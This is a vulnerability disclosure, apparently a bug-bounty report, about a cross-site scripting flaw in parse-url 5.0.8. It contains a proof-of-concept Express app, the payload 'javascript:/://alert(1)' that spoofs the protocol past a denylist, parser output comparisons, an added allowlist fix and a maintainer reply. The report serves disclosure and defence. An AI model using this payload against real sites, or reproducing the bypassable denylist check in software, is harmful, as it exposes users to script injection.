Cross Site Scripting via Improper Input Validation in ionicabizau/parse-url
Reported on
Jun 11th 2022
Description
The parse-url parser, version 5.0.8, does not check for the "://" characters between the protocol and the rest of the URL. This allows the javascript protocol itself to be spoofed. This protocol spoofing does not occur in url-parse, new URL(), or url.parse(); only parse-url is affected.
Proof of Concept
const parseUrl = require("parse-url");
const express = require("express");
const app = express();

// parse-url 5.0.8 returns protocol 'javascript:/' for this input, so the
// denylist comparison below never matches.
const parsed = parseUrl("javascript:/://alert(1)");
console.log(parsed);

app.get("/", (req, res) => {
  // Intended to block the javascript protocol; bypassed by the spoofed value.
  if (parsed.protocol !== "javascript") {
    res.send("<a href='" + parsed.href + "'>CLICK ME!</a>");
  }
});

app.listen(9999);
In general, the above Express code rejects the javascript protocol. However, this check can be bypassed using the "://" characters, because parse-url returns "javascript:/" rather than "javascript" as the protocol.
Output of console.log(parsed):
{
protocols: [ 'javascript:/' ],
protocol: 'javascript:/',
port: null,
resource: 'alert(1)',
user: '',
pathname: '',
hash: '',
search: '',
href: 'javascript:/://alert(1)',
query: [Object: null prototype] {}
}
Output: document in the browser
<a href="javascript:/://alert(1)">CLICK ME!</a>
Behaviour of other modules
~/Desktop/npm-research/test
❯ node -e "const parser = require('url-parse');console.log(parser('javascript:/://alert()'))"
{
slashes: false,
protocol: 'javascript:',
hash: '',
query: '',
pathname: '/://alert()',
auth: '',
host: '',
port: '',
hostname: '',
password: '',
username: '',
origin: 'null',
href: 'javascript:/://alert()'
}
~/Desktop/npm-research/test
❯ node -e 'console.log(new URL("javascript:/://alert()"))'
URL {
href: 'javascript:/://alert()',
origin: 'null',
protocol: 'javascript:',
username: '',
password: '',
host: '',
hostname: '',
port: '',
pathname: '/://alert()',
search: '',
searchParams: URLSearchParams {},
hash: ''
}
In these two widely used modules the javascript protocol is not spoofed (both report protocol: 'javascript:'), so the XSS does not occur.
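The following is an added example, not code from the report or from parse-url, showing both why the denylist check in the proof of concept fails and how a defender would write the check instead. The naiveProtocol function is a constructed illustration of the observed behaviour (splitting on the first "://" yields "javascript:/"); it is not parse-url's actual source. The hardened safeHref uses the WHATWG URL parser, which the report shows normalizes this input to protocol "javascript:", and replaces the denylist with an allowlist of http: and https:. All function names are assumptions of this example.

```javascript
// Added example (not part of the original report).

// Constructed illustration of the report's observed output: a parser that
// splits on the first "://" without validating what precedes it returns
// "javascript:/" as the protocol for "javascript:/://alert(1)".
// This is NOT parse-url's code, only a model of the observed behaviour.
function naiveProtocol(input) {
  return input.split("://")[0];
}

// The check from the proof of concept, reproduced for comparison: it passes
// whenever the parser's protocol string is not exactly "javascript".
function denylistAllows(protocolFromParser) {
  return protocolFromParser !== "javascript";
}

// Hardened check: parse with the WHATWG URL parser (which lowercases and
// normalizes the scheme) and allow only http: and https:. Relative or
// unparseable input is rejected instead of being passed through.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

function safeHref(input) {
  let url;
  try {
    url = new URL(input); // throws on relative or malformed input
  } catch {
    return null;
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return null;
  return url.href;
}

// Minimal HTML attribute escaping so the value cannot break out of the quotes.
function escapeAttr(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Renders the link only when the href passed the allowlist check.
function renderLink(input) {
  const href = safeHref(input);
  if (href === null) return "<span>invalid link</span>";
  return `<a href="${escapeAttr(href)}">CLICK ME!</a>`;
}

// Stand-alone demonstration on the report's input.
const sample = "javascript:/://alert(1)";
console.log("naive protocol:", naiveProtocol(sample));        // javascript:/
console.log("denylist allows:", denylistAllows(naiveProtocol(sample))); // true
console.log("hardened render:", renderLink(sample));          // <span>invalid link</span>
console.log("hardened render:", renderLink("https://example.com/page?x=1"));
```

The design point is that the allowlist does not depend on how any particular parser spells the scheme: "javascript:/", "JAVASCRIPT:", "data:" and relative paths all fail the same check, so a bypass in one parser's protocol field no longer reaches the rendered href.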
Impact
Through this vulnerability, an attacker is able to execute malicious scripts in the context of the page that renders the spoofed link.
Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.